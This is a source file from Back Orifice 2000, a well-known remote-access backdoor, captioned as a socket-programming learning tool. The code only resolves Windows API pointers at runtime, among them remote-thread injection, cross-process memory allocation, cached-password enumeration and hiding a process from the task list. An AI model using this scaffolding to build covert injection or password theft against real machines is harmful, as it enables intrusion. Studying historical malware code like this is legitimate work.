func_bo.cpp

简单的远程控制工具,分为服务器与客户斋,让你了解socket编程的知识.

/*  Back Orifice 2000 - Remote Administration Suite
    Copyright (C) 1999, Cult Of The Dead Cow

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

	The author of this program may be contacted at dildog@l0pht.com. */

#include "stdafx.h"
#include "..\\Ctrl_Srvr9.h"

#include "func_Bo.h"

HINSTANCE ghDll_NetApi32;
HINSTANCE ghDll_SvrApi;
HINSTANCE ghDll_Kernel32;
HINSTANCE ghDll_Mpr;
HINSTANCE ghDll_AdvApi32;

CREATESNAPSHOT		pCreateToolhelp32Snapshot; 
MODULEWALK		pModule32First; 
MODULEWALK		pModule32Next; 
PROCESSWALK		pProcess32First; 
PROCESSWALK		pProcess32Next; 
THREADWALK		pThread32First; 
THREADWALK		pThread32Next; 
REGSERVICEPROC		pRegisterServiceProcess;
CREATEREMOTETHREAD	pCreateRemoteThread;
VIRTUALALLOCEX		pVirtualAllocEx;
VIRTUALFREEEX		pVirtualFreeEx;
VIRTUALQUERYEX		pVirtualQueryEx;
VIRTUALPROTECTEX	pVirtualProtectEx;

ENUMPASSWORD pWNetEnumCachedPasswords;

LMS_NETSHAREENUM	pLMSNetShareEnum;
LMS_NETSHAREDEL		pLMSNetShareDel;
LMS_NETSHAREADD		pLMSNetShareAdd;

SVR_NETSHAREENUM	pSVRNetShareEnum;
SVR_NETSHAREDEL		pSVRNetShareDel;
SVR_NETSHAREADD		pSVRNetShareAdd;

REGGETKEYSECURITY	pRegGetKeySecurity;

int InitDynamicLibraries(void)
{
	
	if(g_bIsWinNT)
	{
		ghDll_NetApi32 = LoadLibrary("NETAPI32.DLL");
		if(ghDll_NetApi32==NULL) 
			return -1;

		pLMSNetShareEnum = (LMS_NETSHAREENUM)GetProcAddress(ghDll_NetApi32, "NetShareEnum");
		pLMSNetShareDel = (LMS_NETSHAREDEL)GetProcAddress(ghDll_NetApi32, "NetShareDel");
		pLMSNetShareAdd = (LMS_NETSHAREADD)GetProcAddress(ghDll_NetApi32, "NetShareAdd");
	} 
	else 
	{
		ghDll_SvrApi = LoadLibrary("SVRAPI.DLL"); 
		if(ghDll_SvrApi==NULL) 
			return -1;
		pSVRNetShareEnum = (SVR_NETSHAREENUM)GetProcAddress(ghDll_SvrApi, "NetShareEnum");
		pSVRNetShareDel = (SVR_NETSHAREDEL)GetProcAddress(ghDll_SvrApi, "NetShareDel");
		pSVRNetShareAdd = (SVR_NETSHAREADD)GetProcAddress(ghDll_SvrApi, "NetShareAdd");
	}
	
	ghDll_Mpr=LoadLibrary("MPR.DLL");
	if(ghDll_Mpr==NULL) return -1;
	
	if(!g_bIsWinNT) {
		pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(ghDll_Mpr, "WNetEnumCachedPasswords");
	}
	
	ghDll_AdvApi32=LoadLibrary("ADVAPI32.DLL");
	if(ghDll_AdvApi32==NULL) return -1;

	ghDll_Kernel32=LoadLibrary("KERNEL32.DLL");
	if(ghDll_Kernel32==NULL) return -1;
    
	if(!g_bIsWinNT) 
	{
		pCreateToolhelp32Snapshot = (CREATESNAPSHOT)GetProcAddress(ghDll_Kernel32,
			"CreateToolhelp32Snapshot"); 
		
		pModule32First  = (MODULEWALK)GetProcAddress(ghDll_Kernel32, 
		    "Module32First"); 
		pModule32Next   = (MODULEWALK)GetProcAddress(ghDll_Kernel32,
		    "Module32Next"); 
			
		pProcess32First = (PROCESSWALK)GetProcAddress(ghDll_Kernel32, 
		    "Process32First"); 
		pProcess32Next  = (PROCESSWALK)GetProcAddress(ghDll_Kernel32, 
		    "Process32Next"); 
			
		pThread32First  = (THREADWALK)GetProcAddress(ghDll_Kernel32, 
		    "Thread32First"); 
		pThread32Next   = (THREADWALK)GetProcAddress(ghDll_Kernel32, 
		    "Thread32Next"); 
		
		pRegisterServiceProcess = (REGSERVICEPROC)GetProcAddress(ghDll_Kernel32,
			"RegisterServiceProcess");

		pRegGetKeySecurity = (REGGETKEYSECURITY)GetProcAddress(ghDll_AdvApi32,
			"RegGetKeySecurity");
	} 
	else 
	{
		pCreateRemoteThread=(CREATEREMOTETHREAD) GetProcAddress(ghDll_Kernel32,
			"CreateRemoteThread");
		pVirtualProtectEx = (VIRTUALPROTECTEX)GetProcAddress(ghDll_Kernel32, 
		    "VirtualProtectEx"); 
		pVirtualAllocEx = (VIRTUALALLOCEX)GetProcAddress(ghDll_Kernel32, 
		    "VirtualAllocEx"); 
		pVirtualQueryEx   = (VIRTUALQUERYEX)GetProcAddress(ghDll_Kernel32, 
		    "VirtualQueryEx"); 
		pVirtualFreeEx   = (VIRTUALFREEEX)GetProcAddress(ghDll_Kernel32, 
		    "VirtualFreeEx"); 
	}

		
	return 0;
}


int KillDynamicLibraries(void)
{
	if(ghDll_Kernel32!=NULL) 
		FreeLibrary(ghDll_Kernel32);
	if(ghDll_NetApi32!=NULL) 
		FreeLibrary(ghDll_NetApi32);
	if(ghDll_SvrApi!=NULL) 
		FreeLibrary(ghDll_SvrApi);

	return 0;
}